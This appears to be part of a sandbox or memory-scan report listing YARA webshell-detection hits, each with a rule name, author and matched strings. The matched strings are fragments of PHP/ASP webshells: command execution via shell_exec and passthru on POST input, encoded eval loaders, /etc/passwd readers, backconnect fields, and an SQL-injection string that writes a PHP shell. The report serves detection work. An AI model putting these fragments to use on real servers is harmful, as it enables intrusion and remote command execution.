- 0x39d2e:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x39d81:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0007 | Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39f17:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x39f6a:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0008 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a14c:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x3a19e:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x3a1ef:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x3a240:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0009 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a44e:$s0: $sess_data["cut"] = array(); c99_s
- 0x3a475:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0010 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3927e:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x3a621:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x3a664:$s2: c99sh_sqlquery
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0011 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a7ff:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x3a850:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0012 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x27a0a:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x27a5b:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x3aa09:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x27a35:$s1: .$arrow."</b>",in('text','
- 0x3aa35:$s1: .$arrow."</b>",in('text','
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0013 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3abab:$s0: 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
- 0x3abe9:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x32299:$s2: rst.void.ru
- 0x379f5:$s2: rst.void.ru
- 0x37a11:$s2: rst.void.ru
- 0x3ac16:$s2: rst.void.ru
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0014 | Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3adb9:$s0: echo ws(2).$lb." <a
- 0x3add1:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x4d4b0:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3ae07:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3afe8:$s0: if(eregi("./shbd $por",$scan))
- 0x3b00b:$s1: $_POST['backconnectip']
- 0x55e36:$s1: $_POST['backconnectip']
- 0x3b027:$s2: $_POST['backcconnmsg']
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0016 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b219:$s1: if(rmdir($_POST['mk_name']))
- 0x3b23a:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x3b28d:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0017 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b481:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x3b4b3:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x3b4fe:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_php_webshells | Semi-Auto-generated - from files multiple_php_webshells | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ab50:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b73b:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b790:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x3b7e5:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0019 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b99d:$s0: <b>Dumped! Dump has been writed to
- 0x3b9c5:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x3ba19:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0020 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3bbdf:$s0: @ini_set("highlight
- 0x3bbf7:$s1: echo "<b>Result of execution this PHP-code</b>:<br>";
- 0x3bc31:$s2: {$row[] = "<b>Owner/Group</b>";}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0021 | Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3bdd7:$s2: echo $uname."</font><br><b>";
- 0x3bdf9:$s3: while(!feof($f)) { $res.=fread($f,1024); }
- 0x3be28:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0022 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c006:$s0: c99ftpbrutecheck
- 0x3c01b:$s1: $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
- 0x3c053:$s2: $fqb_lenght = $nixpwdperpage;
- 0x3c075:$s3: $sock = @ftp_connect($host,$port,$timeout);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0023 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c224:$s0: $sqlquicklaunch[] = array("
- 0x3c244:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0024 | Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c3f9:$s0: if(@$_POST['save'])writef($file,$_POST['data']);
- 0x3c42e:$s1: if($action=="phpeval"){
- 0x3c44a:$s2: $uploadfile = $dirupload."/".$_POST['filename'];
- 0x3c47f:$s3: $dir=getcwd()."/";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0025 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c5e7:$s3: if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0026 | Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c78c:$s0: if ($filename != "." and $filename != ".."){
- 0x4844c:$s0: if ($filename != "." and $filename != ".."){
- 0x3c7bd:$s1: $dires = $dires . $directory;
- 0x3c7df:$s4: $arr = array_merge($arr, glob("*"));
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0027 | Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c9a7:$s0: @$rto=$_POST['rto'];
- 0x3c9c0:$s2: SCROLLBAR-TRACK-COLOR: #91AAFF
- 0x3c9e3:$s3: $to1=str_replace("//","/",$to1);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0028 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cba4:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
- 0x3cbf1:$s1: $group["execute"] = ($mode & 00010)?"x":"-";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0029 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cde4:$s0: $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_php_webshells_2 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cfdc:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x3d02e:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x3d07e:$s3: $s = "!^(".implode("|",$tmp).")$!i";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0030 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d224:$s0: if ($total === FALSE) {$total = 0;}
- 0x3d24c:$s1: $free_percent = round(100/($total/$free),2);
- 0x3d27d:$s2: if (!$bool) {$bool = is_dir($letter.":\\");}
- 0x3d2ae:$s3: $bool = $isdiskette = in_array($letter,$safemode_diskettes);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0031 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d476:$s0: $res = mssql_query("select * from r57_temp_table",$db);
- 0x3d4b2:$s2: 'eng_text30'=>'Cat file',
- 0x3d4d0:$s3: @mssql_query("drop table r57_temp_table",$db);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0032 | Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3d671:$s0: $num = $nixpasswd + $nixpwdperpage;
- 0x3d699:$s1: $ret = posix_kill($pid,$sig);
- 0x3d6bb:$s2: if ($uid) {echo join(":",$uid)."<br>";}
- 0x3d6e7:$s3: $i = $nixpasswd;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DarkSecurityTeam_Webshell | Dark Security Team Webshell | Florian Roth | - 0x3d7d6:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Cloaked_Webshell_SuperFetchExec | Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC | Florian Roth | - 0x3d943:$s0: else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_RemExp_asp_php | PHP Webshells Github Archive - file RemExp.asp.php.txt | Florian Roth | - 0x3da56:$s0: lsExt = Right(FileName, Len(FileName) - liCount)
- 0x31d7d:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3da8b:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x4da3a:$s7: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3dadc:$s13: Response.Write Drive.ShareName & " [share]"
- 0x3db0d:$s19: If Request.QueryString("CopyFile") <> "" Then
- 0x3db40:$s20: <td width="40%" height="20" bgcolor="silver"> Name</td>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_dC3_Security_Crew_Shell_PRiV | PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php | Florian Roth | - 0x3dc6e:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x43776:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x3dcab:$s4: $ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
- 0x3dce2:$s5: header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- 0x3dd1d:$s15: search_file($_POST['search'],urldecode($_POST['dir']));
- 0x3dd5a:$s16: echo base64_decode($images[$_GET['pic']]);
- 0x3dd8a:$s20: if (isset($_GET['rename_all'])) {
- 0x43852:$s20: if (isset($_GET['rename_all'])) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simattacker | PHP Webshells Github Archive - file simattacker.php | Florian Roth | - 0x3de7f:$s1: $from = rand (71,1020000000)."@"."Attacker.com";
- 0x3deb4:$s4: Turkish Hackers : WWW.ALTURKS.COM <br>
- 0x3dee5:$s5: Programer : SimAttacker - Edited By KingDefacer<br>
- 0x3df23:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef12:$s6: //fake mail = Use victim server 4 DOS - fake mail
- 0x3df5b:$s10: e-mail : kingdefacer@msn.com<br>
- 0x3df87:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3ef92:$s17: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3dfbc:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3efc7:$s18: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3dff8:$s20: $Comments=$_POST['Comments'];
- 0x3f003:$s20: $Comments=$_POST['Comments'];
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_DTool_Pro | PHP Webshells Github Archive - file DTool Pro.php | Florian Roth | - 0x3e0e5:$s1: function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pront
- 0x3e139:$s2: <font size=3>by r3v3ng4ns - revengans@gmail.com </font>
- 0x3e175:$s3: function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDig
- 0x3e1c9:$s11: //Turns the 'ls' command more usefull, showing it as it looks in the shell
- 0x3e219:$s13: if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
- 0x3e269:$s14: //To keep the changes in the url, when using the 'GET' way to send php variables
- 0x3e2bf:$s16: function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite
- 0x3e313:$s18: if(empty($fu)) $fu = @$_GET['fu'];
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ironshell | PHP Webshells Github Archive - file ironshell.php | Florian Roth | - 0x3e405:$s0: <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
- 0x3e43a:$s2: $link = mysql_connect($_POST['host'], $_POST['username'], $_POST
- 0x3e47f:$s4: error_reporting(0); //If there is an error, we'll show it, k?
- 0x3e4c1:$s8: print "<form action=\"".$me."?p=chmod&file=".$content."&d
- 0x3e500:$s15: if(!is_numeric($_POST['timelimit']))
- 0x3e52a:$s16: if($_POST['chars'] == "9999")
- 0x3e54d:$s17: <option value=\"az\">a - zzzzz</option>
- 0x3e57a:$s18: print shell_exec($command);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_indexer_asp_php | PHP Webshells Github Archive - file indexer.asp.php.txt | Florian Roth | - 0x3e671:$s0: <meta http-equiv="Content-Language" content="tr">
- 0x3e6a7:$s1: <title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>
- 0x3e6e2:$s2: <form action="?Gonder" method="post">
- 0x3e70c:$s4: <form action="?oku" method="post">
- 0x3e733:$s7: var message="SaNaLTeRoR -
- 0x3e752:$s8: nDexEr - Reader"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_toolaspshell | PHP Webshells Github Archive - file toolaspshell.php | Florian Roth | - 0x3e838:$s0: cprthtml = "<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef
- 0x3e88d:$s12: barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
- 0x3e8ce:$s20: destino3 = folderItem.path & "\index.asp"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_b374k_mini_shell_php_php | PHP Webshells Github Archive - file b374k-mini-shell-php.php.php | Florian Roth | - 0x3e9e5:$s0: @error_reporting(0);
- 0x3e9fe:$s2: @eval(gzinflate(base64_decode($code)));
- 0x3ea2a:$s3: @set_time_limit(0);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Sincap_1_0 | PHP Webshells Github Archive - file Sincap 1.0.php | Florian Roth | - 0x3eb10:$s4: </font></span><a href="mailto:shopen@aventgrup.net">
- 0x3eb49:$s5: <title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B
- 0x3eb87:$s9: </span>Avrasya Veri ve NetWork Teknolojileri Geli
- 0x3ebbe:$s12: while (($ekinci=readdir ($sedat))){
- 0x3ebe7:$s19: $deger2= "$ich[$tampon4]";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_b374k_php | PHP Webshells Github Archive - file b374k.php.php | Florian Roth | - 0x3ecd1:$s0: // encrypt your password to md5 here http://kerinci.net/?x=decode
- 0x3ed17:$s6: // password (default is: b374k)
- 0x3ed3b:$s8: //******************************************************************************
- 0x3ed90:$s9: // b374k 2.2
- 0x3eda2:$s10: eval("?>".gzinflate(base64_decode(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend | PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x3eede:$s4: Iranian Hackers : WWW.SIMORGH-EV.COM <br>
- 0x3df23:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef12:$s5: //fake mail = Use victim server 4 DOS - fake mail
- 0x3ef4a:$s10: <a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
- 0x3df87:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3ef92:$s16: error_reporting(E_ERROR | E_WARNING | E_PARSE);
- 0x3dfbc:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3efc7:$s17: echo "<font size='1' color='#999999'>Dont in windows";
- 0x3dff8:$s19: $Comments=$_POST['Comments'];
- 0x3f003:$s19: $Comments=$_POST['Comments'];
- 0x3f026:$s20: Victim Mail :<br><input type='text' name='to' ><br>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_h4ntu_shell__powered_by_tsoi_ | PHP Webshells Github Archive - file h4ntu shell [powered by tsoi | unknown | - 0x3f152:$s11: <title>h4ntu shell [powered by tsoi]</title>
- 0x3f184:$s13: $cmd = $_POST['cmd'];
- 0x3f5be:$s13: $cmd = $_POST['cmd'];
- 0x3f19f:$s16: $uname = posix_uname( );
- 0x30ec8:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x3f1bd:$s17: if(!$whoami)$whoami=exec("whoami");
- 0x3f1e6:$s18: echo "<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>
- 0x3f23b:$s20: ob_end_clean();
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_MyShell | PHP Webshells Github Archive - file MyShell.php | Florian Roth | - 0x3f324:$s3: <title>MyShell error - Access Denied</title>
- 0x3f355:$s4: $adminEmail = "youremail@yourserver.com";
- 0x3f383:$s5: //A workdir has been asked for - we chdir to that dir.
- 0x3f3be:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4541d:$s6: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x3f40f:$s13: #$autoErrorTrap Enable automatic error traping if command returns error.
- 0x3f45d:$s14: /* No work_dir - we chdir to $DOCUMENT_ROOT */
- 0x3f491:$s19: #every command you excecute.
- 0x3f4b3:$s20: <form name="shell" method="post">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_pws | PHP Webshells Github Archive - file pws.php | Florian Roth | - 0x3f5a6:$s6: if ($_POST['cmd']){
- 0x3f184:$s7: $cmd = $_POST['cmd'];
- 0x3f5be:$s7: $cmd = $_POST['cmd'];
- 0x3f5d9:$s10: echo "FILE UPLOADED TO $dez";
- 0x3f5fc:$s11: if (file_exists($uploaded)) {
- 0x3f61f:$s12: copy($uploaded, $dez);
- 0x3f63b:$s17: passthru($cmd);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_reader_asp_php | PHP Webshells Github Archive - file reader.asp.php.txt | Florian Roth | - 0x3f724:$s5: ster" name=submit> </Font> <a href=mailto:mailbomb@hotmail
- 0x3f779:$s12: HACKING
- 0x3f788:$s16: FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT:
- 0x3f7de:$s20: PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php | Florian Roth | - 0x3f93c:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x41aae:$s1: <option value="/etc/passwd">Get /etc/passwd</option>
- 0x3f975:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x41b35:$s6: by PHP Emperor<xb5@hotmail.com>
- 0x3f999:$s9: ".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.
- 0x3f9ed:$s11: die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
- 0x3fa21:$s15: if(empty($_GET['file'])){
- 0x3fa40:$s16: echo "<head><title>Safe Mode Shell</title></head>";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x3fba8:$s4: $liz0zim=shell_exec($_POST[liz0]);
- 0x3fbd0:$s6: $liz0=shell_exec($_POST[baba]);
- 0x3fbf5:$s9: echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E
- 0x3fc4a:$s12: :=) :</font><select size="1" name="liz0">
- 0x21a67:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x3fc7a:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_backdoor | PHP Webshells Github Archive - file php-backdoor.php | Florian Roth | - 0x3fd84:$s5: http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- 0x3fdc4:$s6: // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi
- 0x3fe1a:$s11: if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- 0x3fe5b:$s13: else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
- 0x245aa:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x3fe9e:$s15: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Worse_Linux_Shell | PHP Webshells Github Archive - file Worse Linux Shell.php | Florian Roth | - 0x3ffcc:$s4: if( $_POST['_act'] == "Upload!" ) {
- 0x3fff4:$s5: print "<center><h1>#worst @dal.net</h1></center>";
- 0x4002b:$s7: print "<center><h1>Linux Shells</h1></center>";
- 0x4005f:$s8: $currentCMD = "ls -la";
- 0x4007c:$s14: print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
- 0x400bf:$s19: $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_pHpINJ | PHP Webshells Github Archive - file pHpINJ.php | Florian Roth | - 0x401cd:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x505a0:$s3: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x40211:$s10: <form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
- 0x4025d:$s11: $sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN
- 0x402b1:$s13: Full server path to a writable file which will contain the Php Shell <br />
- 0x40302:$s14: $expurl= $url."?id=".$sql ;
- 0x40323:$s15: <header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
- 0x40370:$s16: <input type = "submit" value = "Create Exploit"> <br /> <br />
|
